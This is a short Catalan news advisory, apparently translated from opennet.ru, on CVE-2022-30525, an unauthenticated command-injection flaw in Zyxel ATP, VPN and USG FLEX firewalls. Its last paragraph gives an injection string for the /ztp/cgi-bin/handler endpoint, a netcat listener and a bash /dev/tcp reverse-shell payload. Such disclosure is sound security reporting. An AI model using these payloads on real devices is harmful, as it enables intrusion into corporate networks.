Vulnerabilitat als tallafocs Zyxel que permet l'execució de codi sense autenticació

S'ha identificat una vulnerabilitat crítica (CVE-2022-30525) en els dispositius Zyxel de les sèries ATP, VPN i USG FLEX, dissenyats per organitzar el funcionament de tallafocs, IDS i VPN a les empreses, que permet a un atacant extern executar codi a la xarxa. dispositiu sense drets d'usuari sense autenticació. Per dur a terme un atac, un atacant ha de poder enviar sol·licituds al dispositiu mitjançant el protocol HTTP/HTTPS. Zyxel ha solucionat la vulnerabilitat de l'actualització del microprogramari ZLD 5.30. Segons el servei Shodan, actualment hi ha 16213 dispositius potencialment vulnerables a la xarxa global que accepten sol·licituds mitjançant HTTP/HTTPS.

L'operació es realitza enviant ordres especialment dissenyades al gestor web /ztp/cgi-bin/handler, accessible sense autenticació. El problema és causat per la manca d'una neteja adequada dels paràmetres de sol·licitud quan s'executen ordres al sistema mitjançant la crida os.system utilitzada a la biblioteca lib_wan_settings.py i executada en processar l'operació setWanPortSt.

Per exemple, un atacant podria passar la cadena “; ping 192.168.1.210;" que conduirà a l'execució de l'ordre "ping 192.168.1.210" al sistema. Per accedir a l'intèrpret d'ordres, podeu executar “nc -lvnp 1270” al vostre sistema i, a continuació, iniciar una connexió inversa enviant una sol·licitud al dispositiu amb el signe '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.

Font: opennet.ru

Afegeix comentari